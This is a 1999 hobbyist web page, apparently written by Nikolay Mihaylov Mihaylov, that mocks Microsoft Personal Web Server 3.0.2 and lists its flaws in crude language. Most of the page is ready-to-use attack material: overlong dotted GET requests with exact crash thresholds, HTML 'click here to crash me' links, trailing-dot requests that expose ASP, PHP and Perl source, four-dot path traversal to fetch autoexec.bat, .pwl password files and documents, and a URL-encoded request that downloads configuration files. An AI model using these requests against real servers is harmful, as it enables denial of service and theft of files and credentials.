M$ Personal Web Server
SUCKS!

What you want to EAT today?
Start Sucks Menu
  1. Basics
  2. Buffer overflow
    • Buffer overflow?
    • How many dots we need?
    • Does we need dots???
    • How many we need?
    • How we can't crash the server
  3. More Fuckin' dots
    • Content Type changing (not exactly my exploit)
    • Mysterious moved document
    • Strange indexing
  4. Grabbing files out of WWW root
  5. Downloading server configuration files
  6. Dots and Windows Explorer
  7. Some words about other web servers
    • Some GOOD words about Linux using VFAT fs.
Basics

M$ Personal Web Server is part of M$ Front Page.

M$ Front Page is visual WYSIWYG HTML editor. The best visual HTML editor for me, if you are not in internet when you are using it.

Front Page/Personal Web Server Version: 3.0.2

System Date is: 26.Sep.1999

Buffer overflow

Its easy! Use telnet, web browser or HTML link

Telnet:

GET /...<many_dots_here>.../

HTML link (exploit):

<Body>
<H1><A Href="/...<300_dots_here>.../">
Click Here To Crash Me</A>

For server crash you must request any server valid method (GET, POST, PUT etc). The server will crash too, if HTTP method is "disabled" in the directory (often POST is disabled for regular HTMLs)

How many dots we need?

213 All's OKi
214 Server will process request, then CRASH
217 Server CRASH directly

Does we need dots???

You may crash the server with request like this too:

Telnet:

GET xxx<many_symbols_here>xxx

HTML link (exploit):

<Body>
<H1><A Href="/xxx<300_symbols_here>xxx/">
Click Here To Crash Me</A>

How many we need?

214 All's OKi
215 Server CRASH directly

How we can't crash the server

Server will not be crashed if we use requests like these

Telnet:

GET some_short_text_here/..<dots_here>...
GET some_short_text_here...<dots_here>...

The second request is interesting, and show us another suck. It will be shown in next chapter

More Fuckin' dots

Content Type changing:

What is the difference between these two files?

http://crypthon/x/a.htm
http://crypthon/x/a.htm.
http://crypthon/x/a.gif
http://crypthon/x/a.gif.

From DOS/WIN level - there is NO difference.

From MS Personal Web Server - there IS. First one is "text/html" second is "text/plain" (or default unknown MIME type). The second group is the same - content-type for "dotted" "GIF" is "text/plain".

This is not my exploit. Before some time there was a message that MS Personal Web Server crush the ASP scripts, if you "dotted" them.

http://crypthon/x/a.asp.

The server simply do not process them!!! And you get the ASP script instead processed page!!!

This is same for PHP!!! And for any other preprocessor!!!

This is same for Perl!!! And for any other interpretator!!!

Mysterious moved document:

And what if I make some like this:

http://crypthon/x/<any_text_here>..

If you do this, you will get HTTP error 302 - Document Moved. The example above will be moved to:

http://crypthon/x/

Strange indexing

Ok, but what about directories?

http://crypthon/any_text_here/....<at_leaset_4_dots>/

You will get "Index Of /any_text_here/..../

Grabbing files out of WWW root

This strange indexing can help us to get a file out of WWW root. What about this?

http://crypthon/any_text_here/..../autoexec.bat
http://crypthon/any_text_here/..../windows/niki.pwl
http://crypthon/any_text_here/..../my%20documents/secret.doc

Here you are webpage that exploit this:

<Body>
<H1><A Href="http://crypthon/..../autoexec.bat">
Click Here To GET a copy of autoexec.bat
</A>

I leave this without comments...

Downloading server configuration files

MS Personal Web Server use for configuration files with name "#haccess.ctl". This  is simillar to ".htaccess" files for Apache.

The server MUST reject their downloading. Following URL will not wok:

http://crypthon/#haccess.ctl

But this one - WILL:

http://crypthon/%23haccess.ctl

Explanation is that '#' is special character in "HTTP" URL. Second URL "url_encode" it.

Here you are webpage that exploit this:

<Body>
<H1><A Href="http://crypthon/%23haccess.ctl">
Need copy of htaccess ???</A>
Dots and Windows Explorer

There will be shown another derived bugs:

First one:

Open Notepad (or any other Win App). Save file as:

.niki.txt

Then go and try to rename it :o)

Second:

Make a file "niki.txt"

Try to rename it to "niki.txt." or "niki.txt..........."

This is not a crack or exploit, but this will show you how windows works with file extensions.

Some words about other web servers
  • Apache Win 32 - OKi
  • Xitami Win 32 - OKi
  • MSIIS Win 32 - same sucks
  • MSIIS Win NT - OKi
  • Sambar - OKi, except content-type changing for CGI - DLL's and for SSI (This mean you can downloading them). Interpretators/parsers like Perl and PHP are OKi
  • Octarion (My own Java Server) - OKi (((:WoW, I'm really happy:)))
  • If you are running Linux and using VFAT disk partition (often mounted). You will have NO any problems like these. Including serving web pages from VFAT partition with the Apache HTTPd.
Do you still use Front Page?
(me - YES, but without server)
1997 - 1999
Nikolay Mihaylov Mihaylov